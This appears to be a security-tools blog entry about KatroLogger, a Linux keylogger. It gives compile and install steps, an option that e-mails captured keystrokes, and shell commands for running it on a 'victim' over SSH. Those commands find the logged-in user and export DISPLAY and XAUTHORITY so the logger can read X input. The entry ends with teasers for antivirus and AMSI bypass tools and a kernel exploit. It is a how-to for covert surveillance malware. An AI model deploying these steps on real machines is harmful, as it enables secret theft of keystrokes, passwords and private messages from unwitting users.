KatroLogger is a tool used for KeyLogger for Linux Systems.
Features
Dependencies
Compiling
./configure
make
make install
Also Read – Atlas : Quick SQLMap Tamper Suggester v1.0
Usage
katrologger –output /path/file
Send data by e-mail:
katrologger –smtp-help
when connecting to the victim remotely via ssh it will be necessary to export environment variables to run the keylogger.
identifying logged in user
user=$(who | grep “(:0)” | awk ‘{print $1}’)
echo $user
Exporting Variables
export DISPLAY=:0.0
export XAUTHORITY=/home/$user/.Xauthority
Uninstall
make uninstall
BypassAV refers to the collection of techniques and tools used to bypass antivirus (AV) and…
ComDotNetExploit is a Proof of Concept (PoC) tool designed to demonstrate the exploitation of Windows…
Trigon is a sophisticated deterministic kernel exploit targeting Apple’s iOS devices, leveraging the CVE-2023-32434 vulnerability.…
Bug bounty report templates are essential tools for streamlining the process of documenting vulnerabilities. They…
FullBypass is a tool designed to circumvent Microsoft's Antimalware Scan Interface (AMSI) and PowerShell's Constrained…
Carseat is a Python-based tool that replicates the functionality of the well-known security auditing tool,…